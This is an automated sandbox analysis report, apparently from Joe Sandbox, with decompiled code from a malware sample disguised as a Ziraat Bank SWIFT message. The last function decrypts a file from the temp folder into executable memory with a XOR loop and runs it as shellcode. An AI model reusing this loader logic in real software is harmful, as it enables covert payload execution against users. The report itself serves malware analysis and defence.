                                  											_v12 = _v12 + _t43;
                                  											_a4 = _a4 - _t43;
                                  											 *0x41703c =  *0x41703c + _t43;
                                  											if(_a4 > 0) {
                                  												continue;
                                  											} else {
                                  												goto L22;
                                  											}
                                  										}
                                  										goto L25;
                                  									}
                                  									goto L23;
                                  								}
                                  							}
                                  						}
                                  					}
                                  				}
                                  				L25:
                                  				return _t32;
                                  			}

















                                  0x00402f06
                                  0x00402f10
                                  0x00402f19
                                  0x00402f1d
                                  0x00402f28
                                  0x00402f28
                                  0x00402f30
                                  0x00402f32
                                  0x00402f39
                                  0x00402f55
                                  0x00402f59
                                  0x00403022
                                  0x00403022
                                  0x00000000
                                  0x00402f68
                                  0x00402f6b
                                  0x00402f71
                                  0x00402f78
                                  0x00402f7b
                                  0x00402f84
                                  0x00402ff1
                                  0x00402ff7
                                  0x00402ff9
                                  0x00402ff9
                                  0x0040300b
                                  0x0040300f
                                  0x00000000
                                  0x00403011
                                  0x00403011
                                  0x00403014
                                  0x0040301a
                                  0x00000000
                                  0x0040301a
                                  0x00402f86
                                  0x00402f89
                                  0x0040301d
                                  0x0040301d
                                  0x00402f8f
                                  0x00402f94
                                  0x00402f94
                                  0x00402f9c
                                  0x00402f9e
                                  0x00402f9e
                                  0x00402faf
                                  0x00402fb3
                                  0x00000000
                                  0x00000000
                                  0x00402fc7
                                  0x00402fcf
                                  0x00402fed
                                  0x00403024
                                  0x00403024
                                  0x00402fd6
                                  0x00402fd6
                                  0x00402fd9
                                  0x00402fdc
                                  0x00402fdf
                                  0x00402fe9
                                  0x00000000
                                  0x00402feb
                                  0x00000000
                                  0x00402feb
                                  0x00402fe9
                                  0x00000000
                                  0x00402fcf
                                  0x00000000
                                  0x00402f94
                                  0x00402f89
                                  0x00402f84
                                  0x00402f7b
                                  0x00402f59
                                  0x00403025
                                  0x00403029

                                  APIs
                                  • SetFilePointer.KERNELBASE(00409128,00000000,00000000,00000000,00000000,00000000,?,?,?,00402EAD,000000FF,00000000,00000000,00409128,?), ref: 00402F28
                                  • ReadFile.KERNELBASE(00409128,00000004,?,00000000,00000004,00000000,00000000,00000000,?,?,?,00402EAD,000000FF,00000000,00000000,00409128), ref: 00402F55
                                  • ReadFile.KERNELBASE(00413038,00004000,?,00000000,00409128,?,00402EAD,000000FF,00000000,00000000,00409128,?), ref: 00402FAF
                                  • WriteFile.KERNELBASE(00000000,00413038,?,000000FF,00000000,?,00402EAD,000000FF,00000000,00000000,00409128,?), ref: 00402FC7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.293204636.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.293198616.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293230556.0000000000407000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293256524.0000000000409000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293314414.0000000000422000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293341301.0000000000429000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293356616.000000000042C000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Ziraat Bankasi Swift Mesaji.jbxd
                                  Similarity
                                  • API ID: File$Read$PointerWrite
                                  • String ID: 80A
                                  • API String ID: 2113905535-195308239
                                  • Opcode ID: 1d0c5bb9ecfe910818843e6bf7809c02e5eaef0b1ff428f1de7b4674f3045140
                                  • Instruction ID: 41b23491bffeaa1753be022b97a7ffae9df7beca0cc47644b0b6bde15745b2e9
                                  • Opcode Fuzzy Hash: 1d0c5bb9ecfe910818843e6bf7809c02e5eaef0b1ff428f1de7b4674f3045140
                                  • Instruction Fuzzy Hash: 91310B31901209EFDF21CF55DE84DAE7BB8EB453A5F20403AF504E61E0D2749E41EB69
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 415 40302c-403055 GetTickCount 416 403196-40319e call 402bc5 415->416 417 40305b-403086 call 4031da SetFilePointer 415->417 422 4031a0-4031a5 416->422 423 40308b-40309d 417->423 424 4030a1-4030af call 4031a8 423->424 425 40309f 423->425 428 4030b5-4030c1 424->428 429 403188-40318b 424->429 425->424 430 4030c7-4030cd 428->430 429->422 431 4030f8-403114 call 405e9d 430->431 432 4030cf-4030d5 430->432 438 403191 431->438 439 403116-40311e 431->439 432->431 433 4030d7-4030f7 call 402bc5 432->433 433->431 440 403193-403194 438->440 441 403120-403136 WriteFile 439->441 442 403152-403158 439->442 440->422 444 403138-40313c 441->444 445 40318d-40318f 441->445 442->438 443 40315a-40315c 442->443 443->438 446 40315e-403171 443->446 444->445 447 40313e-40314a 444->447 445->440 446->423 448 403177-403186 SetFilePointer 446->448 447->430 449 403150 447->449 448->416 449->446
                                  C-Code - Quality: 94%
                                  			E0040302C(intOrPtr _a4) {
                                  				long _v4;
                                  				void* __ecx;
                                  				intOrPtr _t12;
                                  				intOrPtr _t13;
                                  				signed int _t14;
                                  				void* _t16;
                                  				void* _t17;
                                  				long _t18;
                                  				int _t21;
                                  				intOrPtr _t22;
                                  				intOrPtr _t34;
                                  				long _t35;
                                  				intOrPtr _t37;
                                  				void* _t39;
                                  				long _t40;
                                  				intOrPtr _t53;
                                  
                                  				_t35 =  *0x41703c; // 0x4e8e4
                                  				_t37 = _t35 -  *0x40afa8 + _a4;
                                  				 *0x423eac = GetTickCount() + 0x1f4;
                                  				if(_t37 <= 0) {
                                  					L23:
                                  					E00402BC5(1);
                                  					return 0;
                                  				}
                                  				E004031DA( *0x41f04c);
                                  				SetFilePointer( *0x409014,  *0x40afa8, 0, 0); // executed
                                  				 *0x41f048 = _t37;
                                  				 *0x417038 = 0;
                                  				while(1) {
                                  					_t12 =  *0x417040; // 0x41f6b
                                  					_t34 = 0x4000;
                                  					_t13 = _t12 -  *0x41f04c;
                                  					if(_t13 <= 0x4000) {
                                  						_t34 = _t13;
                                  					}
                                  					_t14 = E004031A8(0x413038, _t34); // executed
                                  					if(_t14 == 0) {
                                  						break;
                                  					}
                                  					 *0x41f04c =  *0x41f04c + _t34;
                                  					 *0x40afc8 = 0x413038;
                                  					 *0x40afcc = _t34;
                                  					L6:
                                  					L6:
                                  					if( *0x423eb0 != 0 &&  *0x423f40 == 0) {
                                  						_t22 =  *0x41f048; // 0x44318
                                  						 *0x417038 = _t22 -  *0x41703c - _a4 +  *0x40afa8;
                                  						E00402BC5(0);
                                  					}
                                  					 *0x40afd0 = 0x40b038;
                                  					 *0x40afd4 = 0x8000; // executed
                                  					_t16 = E00405E9D(0x40afb0); // executed
                                  					if(_t16 < 0) {
                                  						goto L21;
                                  					}
                                  					_t39 =  *0x40afd0; // 0x40ed1f
                                  					_t40 = _t39 - 0x40b038;
                                  					if(_t40 == 0) {
                                  						__eflags =  *0x40afcc; // 0x0
                                  						if(__eflags != 0) {
                                  							goto L21;
                                  						}
                                  						__eflags = _t34;
                                  						if(_t34 == 0) {
                                  							goto L21;
                                  						}
                                  						L17:
                                  						_t18 =  *0x41703c; // 0x4e8e4
                                  						if(_t18 -  *0x40afa8 + _a4 > 0) {
                                  							continue;
                                  						}
                                  						SetFilePointer( *0x409014, _t18, 0, 0); // executed
                                  						goto L23;
                                  					}
                                  					_t21 = WriteFile( *0x409014, 0x40b038, _t40,  &_v4, 0); // executed
                                  					if(_t21 == 0 || _t40 != _v4) {
                                  						_push(0xfffffffe);
                                  						L22:
                                  						_pop(_t17);
                                  						return _t17;
                                  					} else {
                                  						 *0x40afa8 =  *0x40afa8 + _t40;
                                  						_t53 =  *0x40afcc; // 0x0
                                  						if(_t53 != 0) {
                                  							goto L6;
                                  						}
                                  						goto L17;
                                  					}
                                  					L21:
                                  					_push(0xfffffffd);
                                  					goto L22;
                                  				}
                                  				return _t14 | 0xffffffff;
                                  			}



















                                  0x00403030
                                  0x0040303d
                                  0x00403050
                                  0x00403055
                                  0x00403196
                                  0x00403198
                                  0x00000000
                                  0x0040319e
                                  0x00403061
                                  0x00403074
                                  0x0040307a
                                  0x00403080
                                  0x0040308b
                                  0x0040308b
                                  0x00403090
                                  0x00403095
                                  0x0040309d
                                  0x0040309f
                                  0x0040309f
                                  0x004030a8
                                  0x004030af
                                  0x00000000
                                  0x00000000
                                  0x004030b5
                                  0x004030bb
                                  0x004030c1
                                  0x00000000
                                  0x004030c7
                                  0x004030cd
                                  0x004030d7
                                  0x004030ed
                                  0x004030f2
                                  0x004030f7
                                  0x004030fd
                                  0x00403103
                                  0x0040310d
                                  0x00403114
                                  0x00000000
                                  0x00000000
                                  0x00403116
                                  0x0040311c
                                  0x0040311e
                                  0x00403152
                                  0x00403158
                                  0x00000000
                                  0x00000000
                                  0x0040315a
                                  0x0040315c
                                  0x00000000
                                  0x00000000
                                  0x0040315e
                                  0x0040315e
                                  0x00403171
                                  0x00000000
                                  0x00000000
                                  0x00403180
                                  0x00000000
                                  0x00403180
                                  0x0040312e
                                  0x00403136
                                  0x0040318d
                                  0x00403193
                                  0x00403193
                                  0x00000000
                                  0x0040313e
                                  0x0040313e
                                  0x00403144
                                  0x0040314a
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00403150
                                  0x00403191
                                  0x00403191
                                  0x00000000
                                  0x00403191
                                  0x00000000

                                  APIs
                                  • GetTickCount.KERNEL32 ref: 00403041
                                    • Part of subcall function 004031DA: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402E86,?), ref: 004031E8
                                  • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,?,00402F37,00000004,00000000,00000000,00000000,?,?,?,00402EAD,000000FF,00000000), ref: 00403074
                                  • WriteFile.KERNELBASE(0040B038,0040ED1F,00000000,00000000,00413038,00004000,?,00000000,?,00402F37,00000004,00000000,00000000,00000000,?,?), ref: 0040312E
                                  • SetFilePointer.KERNELBASE(0004E8E4,00000000,00000000,00413038,00004000,?,00000000,?,00402F37,00000004,00000000,00000000,00000000,?,?), ref: 00403180
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.293204636.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.293198616.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293230556.0000000000407000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293256524.0000000000409000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293314414.0000000000422000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293341301.0000000000429000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293356616.000000000042C000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Ziraat Bankasi Swift Mesaji.jbxd
                                  Similarity
                                  • API ID: File$Pointer$CountTickWrite
                                  • String ID: 80A
                                  • API String ID: 2146148272-195308239
                                  • Opcode ID: 492b146ea58c14309b76aad4efb9c222274e911e7d047196bd2092e933975ded
                                  • Instruction ID: 8653c145dc750015188d6a9afa30315cb9c5a6a6900809742879fa1bd1138a56
                                  • Opcode Fuzzy Hash: 492b146ea58c14309b76aad4efb9c222274e911e7d047196bd2092e933975ded
                                  • Instruction Fuzzy Hash: 74417FB2504302AFD7109F19EE8496A3FBCF748396710813BE511B62F1C7386A559BAE
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 450 401f51-401f5d 451 401f63-401f79 call 4029e8 * 2 450->451 452 40200b-40200d 450->452 461 401f88-401f96 LoadLibraryExA 451->461 462 401f7b-401f86 GetModuleHandleA 451->462 454 402156-40215b call 401423 452->454 460 40287d-40288c 454->460 464 401f98-401fa6 GetProcAddress 461->464 465 402004-402006 461->465 462->461 462->464 467 401fe5-401fea call 404e23 464->467 468 401fa8-401fae 464->468 465->454 472 401fef-401ff2 467->472 470 401fb0-401fbc call 401423 468->470 471 401fc7-401fde call 72c510a0 468->471 470->472 478 401fbe-401fc5 470->478 474 401fe0-401fe3 471->474 472->460 475 401ff8-401fff FreeLibrary 472->475 474->472 475->460 478->472
                                  C-Code - Quality: 57%
                                  			E00401F51(void* __ebx, void* __eflags) {
                                  				struct HINSTANCE__* _t18;
                                  				struct HINSTANCE__* _t25;
                                  				void* _t26;
                                  				struct HINSTANCE__* _t29;
                                  				CHAR* _t31;
                                  				intOrPtr* _t32;
                                  				void* _t33;
                                  
                                  				_t26 = __ebx;
                                  				asm("sbb eax, 0x423f58");
                                  				 *(_t33 - 4) = 1;
                                  				if(__eflags < 0) {
                                  					_push(0xffffffe7);
                                  					L14:
                                  					E00401423();
                                  					L15:
                                  					 *0x423f28 =  *0x423f28 +  *(_t33 - 4);
                                  					return 0;
                                  				}
                                  				_t31 = E004029E8(0xfffffff0);
                                  				 *(_t33 + 8) = E004029E8(1);
                                  				if( *((intOrPtr*)(_t33 - 0x14)) == __ebx) {
                                  					L3:
                                  					_t18 = LoadLibraryExA(_t31, _t26, 8); // executed
                                  					_t29 = _t18;
                                  					if(_t29 == _t26) {
                                  						_push(0xfffffff6);
                                  						goto L14;
                                  					}
                                  					L4:
                                  					_t32 = GetProcAddress(_t29,  *(_t33 + 8));
                                  					if(_t32 == _t26) {
                                  						E00404E23(0xfffffff7,  *(_t33 + 8));
                                  					} else {
                                  						 *(_t33 - 4) = _t26;
                                  						if( *((intOrPtr*)(_t33 - 0x1c)) == _t26) {
                                  							 *_t32( *((intOrPtr*)(_t33 - 0x34)), 0x400, 0x424000, 0x40af68, " ?B"); // executed
                                  						} else {
                                  							E00401423( *((intOrPtr*)(_t33 - 0x1c)));
                                  							if( *_t32() != 0) {
                                  								 *(_t33 - 4) = 1;
                                  							}
                                  						}
                                  					}
                                  					if( *((intOrPtr*)(_t33 - 0x18)) == _t26) {
                                  						FreeLibrary(_t29);
                                  					}
                                  					goto L15;
                                  				}
                                  				_t25 = GetModuleHandleA(_t31); // executed
                                  				_t29 = _t25;
                                  				if(_t29 != __ebx) {
                                  					goto L4;
                                  				}
                                  				goto L3;
                                  			}










                                  0x00401f51
                                  0x00401f51
                                  0x00401f56
                                  0x00401f5d
                                  0x0040200b
                                  0x00402156
                                  0x00402156
                                  0x0040287d
                                  0x00402880
                                  0x0040288c
                                  0x0040288c
                                  0x00401f6c
                                  0x00401f76
                                  0x00401f79
                                  0x00401f88
                                  0x00401f8c
                                  0x00401f92
                                  0x00401f96
                                  0x00402004
                                  0x00000000
                                  0x00402004
                                  0x00401f98
                                  0x00401fa2
                                  0x00401fa6
                                  0x00401fea
                                  0x00401fa8
                                  0x00401fab
                                  0x00401fae
                                  0x00401fde
                                  0x00401fb0
                                  0x00401fb3
                                  0x00401fbc
                                  0x00401fbe
                                  0x00401fbe
                                  0x00401fbc
                                  0x00401fae
                                  0x00401ff2
                                  0x00401ff9
                                  0x00401ff9
                                  0x00000000
                                  0x00401ff2
                                  0x00401f7c
                                  0x00401f82
                                  0x00401f86
                                  0x00000000
                                  0x00000000
                                  0x00000000

                                  APIs
                                  • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 00401F7C
                                    • Part of subcall function 00404E23: lstrlenA.KERNEL32(0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000,?), ref: 00404E5C
                                    • Part of subcall function 00404E23: lstrlenA.KERNEL32(00402C3C,0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000), ref: 00404E6C
                                    • Part of subcall function 00404E23: lstrcatA.KERNEL32(0041FC70,00402C3C,00402C3C,0041FC70,00000000,00000000,00000000), ref: 00404E7F
                                    • Part of subcall function 00404E23: SetWindowTextA.USER32(0041FC70,0041FC70), ref: 00404E91
                                    • Part of subcall function 00404E23: SendMessageA.USER32 ref: 00404EB7
                                    • Part of subcall function 00404E23: SendMessageA.USER32 ref: 00404ED1
                                    • Part of subcall function 00404E23: SendMessageA.USER32 ref: 00404EDF
                                  • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00401F8C
                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00401F9C
                                  • FreeLibrary.KERNEL32(00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 00401FF9
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.293204636.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.293198616.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293230556.0000000000407000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293256524.0000000000409000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293314414.0000000000422000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293341301.0000000000429000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293356616.000000000042C000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Ziraat Bankasi Swift Mesaji.jbxd
                                  Similarity
                                  • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                  • String ID: ?B
                                  • API String ID: 2987980305-117478770
                                  • Opcode ID: 0013dd5c42a12ea961cdb4cd00b6dc1aa0902fbba5a2d5df2c5b14f7f9a972ce
                                  • Instruction ID: 6286e611532d8822c51d7e946ff34bbadf458e6cc54079b264412ac530ebcb8a
                                  • Opcode Fuzzy Hash: 0013dd5c42a12ea961cdb4cd00b6dc1aa0902fbba5a2d5df2c5b14f7f9a972ce
                                  • Instruction Fuzzy Hash: 9611E772D04216EBCF107FA4DE89EAE75B0AB44359F20423BF611B62E0C77C8941DA5E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 480 4015b3-4015c6 call 4029e8 call 40560c 485 4015c8-4015e3 call 4055a3 CreateDirectoryA 480->485 486 40160a-40160d 480->486 495 401600-401608 485->495 496 4015e5-4015f0 GetLastError 485->496 487 40162d-40215b call 401423 486->487 488 40160f-401628 call 401423 call 405a85 SetCurrentDirectoryA 486->488 502 40287d-40288c 487->502 488->502 495->485 495->486 499 4015f2-4015fb GetFileAttributesA 496->499 500 4015fd 496->500 499->495 499->500 500->495
                                  C-Code - Quality: 85%
                                  			E004015B3(struct _SECURITY_ATTRIBUTES* __ebx) {
                                  				struct _SECURITY_ATTRIBUTES** _t10;
                                  				int _t19;
                                  				struct _SECURITY_ATTRIBUTES* _t20;
                                  				signed char _t22;
                                  				struct _SECURITY_ATTRIBUTES* _t23;
                                  				CHAR* _t25;
                                  				struct _SECURITY_ATTRIBUTES** _t29;
                                  				void* _t30;
                                  
                                  				_t23 = __ebx;
                                  				_t25 = E004029E8(0xfffffff0);
                                  				_t10 = E0040560C(_t25);
                                  				_t27 = _t10;
                                  				if(_t10 != __ebx) {
                                  					do {
                                  						_t29 = E004055A3(_t27, 0x5c);
                                  						 *_t29 = _t23;
                                  						 *((char*)(_t30 + 0xb)) =  *_t29;
                                  						_t19 = CreateDirectoryA(_t25, _t23); // executed
                                  						if(_t19 == 0) {
                                  							if(GetLastError() != 0xb7) {
                                  								L4:
                                  								 *((intOrPtr*)(_t30 - 4)) =  *((intOrPtr*)(_t30 - 4)) + 1;
                                  							} else {
                                  								_t22 = GetFileAttributesA(_t25); // executed
                                  								if((_t22 & 0x00000010) == 0) {
                                  									goto L4;
                                  								}
                                  							}
                                  						}
                                  						_t20 =  *((intOrPtr*)(_t30 + 0xb));
                                  						 *_t29 = _t20;
                                  						_t27 =  &(_t29[0]);
                                  					} while (_t20 != _t23);
                                  				}
                                  				if( *((intOrPtr*)(_t30 - 0x20)) == _t23) {
                                  					_push(0xfffffff5);
                                  					E00401423();
                                  				} else {
                                  					E00401423(0xffffffe6);
                                  					E00405A85("C:\\Users\\FRONTD~1\\AppData\\Local\\Temp", _t25);
                                  					SetCurrentDirectoryA(_t25); // executed
                                  				}
                                  				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t30 - 4));
                                  				return 0;
                                  			}











                                  0x004015b3
                                  0x004015ba
                                  0x004015bd
                                  0x004015c2
                                  0x004015c6
                                  0x004015c8
                                  0x004015d0
                                  0x004015d6
                                  0x004015d8
                                  0x004015db
                                  0x004015e3
                                  0x004015f0
                                  0x004015fd
                                  0x004015fd
                                  0x004015f2
                                  0x004015f3
                                  0x004015fb
                                  0x00000000
                                  0x00000000
                                  0x004015fb
                                  0x004015f0
                                  0x00401600
                                  0x00401603
                                  0x00401605
                                  0x00401606
                                  0x004015c8
                                  0x0040160d
                                  0x0040162d
                                  0x00402156
                                  0x0040160f
                                  0x00401611
                                  0x0040161c
                                  0x00401622
                                  0x00401622
                                  0x00402880
                                  0x0040288c

                                  APIs
                                    • Part of subcall function 0040560C: CharNextA.USER32(004053BE,?,004218A0,00000000,00405670,004218A0,004218A0,?,?,76D7F560,004053BE,?,"C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe" ,76D7F560), ref: 0040561A
                                    • Part of subcall function 0040560C: CharNextA.USER32(00000000), ref: 0040561F
                                    • Part of subcall function 0040560C: CharNextA.USER32(00000000), ref: 0040562E
                                  • CreateDirectoryA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015DB
                                  • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015E5
                                  • GetFileAttributesA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015F3
                                  • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user~1\AppData\Local\Temp,00000000,00000000,000000F0), ref: 00401622
                                  Strings
                                  • C:\Users\user~1\AppData\Local\Temp, xrefs: 00401617
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.293204636.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.293198616.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293230556.0000000000407000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293256524.0000000000409000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293314414.0000000000422000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293341301.0000000000429000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293356616.000000000042C000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Ziraat Bankasi Swift Mesaji.jbxd
                                  Similarity
                                  • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                                  • String ID: C:\Users\user~1\AppData\Local\Temp
                                  • API String ID: 3751793516-3107243751
                                  • Opcode ID: b22028777b76ff0adb18f2892ab6001a383c6b987e8d30e1b3724520259a3699
                                  • Instruction ID: 11ba4fe5436512bc7837d50811c3794abd92905400bb47a2e3f09ad75438aea6
                                  • Opcode Fuzzy Hash: b22028777b76ff0adb18f2892ab6001a383c6b987e8d30e1b3724520259a3699
                                  • Instruction Fuzzy Hash: B3010431908150AFDB116FB51D44D7F67B0AA56365768073BF491B22E2C63C4942D62E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 505 40578b-405795 506 405796-4057c0 GetTickCount GetTempFileNameA 505->506 507 4057c2-4057c4 506->507 508 4057cf-4057d1 506->508 507->506 509 4057c6 507->509 510 4057c9-4057cc 508->510 509->510
                                  C-Code - Quality: 100%
                                  			E0040578B(char _a4, intOrPtr _a6, CHAR* _a8) {
                                  				signed int _t11;
                                  				int _t14;
                                  				signed int _t16;
                                  				void* _t19;
                                  				CHAR* _t20;
                                  
                                  				_t20 = _a4;
                                  				_t19 = 0x64;
                                  				while(1) {
                                  					_t19 = _t19 - 1;
                                  					_a4 = 0x61736e;
                                  					_t11 = GetTickCount();
                                  					_t16 = 0x1a;
                                  					_a6 = _a6 + _t11 % _t16;
                                  					_t14 = GetTempFileNameA(_a8,  &_a4, 0, _t20); // executed
                                  					if(_t14 != 0) {
                                  						break;
                                  					}
                                  					if(_t19 != 0) {
                                  						continue;
                                  					}
                                  					 *_t20 =  *_t20 & 0x00000000;
                                  					return _t14;
                                  				}
                                  				return _t20;
                                  			}








                                  0x0040578f
                                  0x00405795
                                  0x00405796
                                  0x00405796
                                  0x00405797
                                  0x0040579e
                                  0x004057a8
                                  0x004057b5
                                  0x004057b8
                                  0x004057c0
                                  0x00000000
                                  0x00000000
                                  0x004057c4
                                  0x00000000
                                  0x00000000
                                  0x004057c6
                                  0x00000000
                                  0x004057c6
                                  0x00000000

                                  APIs
                                  • GetTickCount.KERNEL32 ref: 0040579E
                                  • GetTempFileNameA.KERNELBASE(?,0061736E,00000000,?), ref: 004057B8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.293204636.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.293198616.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293230556.0000000000407000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293256524.0000000000409000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293314414.0000000000422000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293341301.0000000000429000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293356616.000000000042C000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Ziraat Bankasi Swift Mesaji.jbxd
                                  Similarity
                                  • API ID: CountFileNameTempTick
                                  • String ID: "C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe" $C:\Users\user~1\AppData\Local\Temp\$nsa
                                  • API String ID: 1716503409-412405104
                                  • Opcode ID: fc5e126f8815d4696b9f295c06fae67d9d4e63728d0dbdda5093f58b42bfadad
                                  • Instruction ID: 4fcdc00fff711095840056c8ed2a58f2bfde19b521d5dac465ae6a1bf3f6778c
                                  • Opcode Fuzzy Hash: fc5e126f8815d4696b9f295c06fae67d9d4e63728d0dbdda5093f58b42bfadad
                                  • Instruction Fuzzy Hash: F9F0A736348304B6D7104E55DC04B9B7F69DF91750F14C02BFA449B1C0D6B0995497A5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  C-Code - Quality: 76%
                                  			E72C510A0(void* __ecx, void* __eflags) {
                                  				short _v8;
                                  				short _v10;
                                  				short _v12;
                                  				short _v14;
                                  				short _v16;
                                  				short _v18;
                                  				short _v20;
                                  				short _v22;
                                  				char _v24;
                                  				void* _v28;
                                  				long _v32;
                                  				long _v36;
                                  				short _v1076;
                                  				void _v6256;
                                  				void* _t35;
                                  				intOrPtr _t38;
                                  				struct _OVERLAPPED* _t61;
                                  				void* _t69;
                                  
                                  				E72C51000(0x186c, __ecx);
                                  				_v24 = 0x66;
                                  				_v22 = 0x64;
                                  				_v20 = 0x61;
                                  				_v18 = 0x7a;
                                  				_v16 = 0x71;
                                  				_v14 = 0x76;
                                  				_v12 = 0x61;
                                  				_v10 = 0x6b;
                                  				_v8 = 0;
                                  				GetTempPathW(0x103,  &_v1076);
                                  				E72C51030( &_v1076,  &_v24);
                                  				VirtualProtect( &_v6256, 0x1439, 0x40,  &_v32); // executed
                                  				_t35 = CreateFileW( &_v1076, 0x80000000, 7, 0, 3, 0x80, 0); // executed
                                  				_v28 = _t35;
                                  				ReadFile(_v28,  &_v6256, 0x1439,  &_v36, 0); // executed
                                  				_t61 = 0;
                                  				while(1) {
                                  					_t38 =  *((intOrPtr*)(_t69 + _t61 - 0x186c));
                                  					if(_t61 == 0x1439) {
                                  						break;
                                  					}
                                  					 *((char*)(_t69 + _t61 - 0x186c)) = (_t38 + 0x00000001 - 0xfffffffffffffffd ^ 0x00000064) - 1 + 0x190;
                                  					_t61 =  &(_t61->Internal);
                                  				}
                                  				_v6256();
                                  				return 0;
                                  			}





















                                  0x72c510a8
                                  0x72c510b2
                                  0x72c510bb
                                  0x72c510c4
                                  0x72c510cd
                                  0x72c510d6
                                  0x72c510df
                                  0x72c510e8
                                  0x72c510f1
                                  0x72c510f7
                                  0x72c51107
                                  0x72c51118
                                  0x72c51132
                                  0x72c51151
                                  0x72c51157
                                  0x72c51170
                                  0x72c51176
                                  0x72c5117b
                                  0x72c5117b
                                  0x72c51188
                                  0x00000000
                                  0x00000000
                                  0x72c511a0
                                  0x72c511a7
                                  0x72c511a7
                                  0x72c511b9
                                  0x72c511c0

                                  APIs
                                  • GetTempPathW.KERNEL32(00000103,?), ref: 72C51107
                                  • VirtualProtect.KERNELBASE(?,00001439,00000040,?), ref: 72C51132
                                  • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 72C51151
                                  • ReadFile.KERNELBASE(?,?,00001439,?,00000000), ref: 72C51170
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.294872829.0000000072C51000.00000020.00020000.sdmp, Offset: 72C50000, based on PE: true
                                  • Associated: 00000000.00000002.294865115.0000000072C50000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.294878554.0000000072C52000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_72c50000_Ziraat Bankasi Swift Mesaji.jbxd
                                  Similarity
                                  • API ID: File$CreatePathProtectReadTempVirtual
                                  • String ID:
                                  • API String ID: 205760209-0
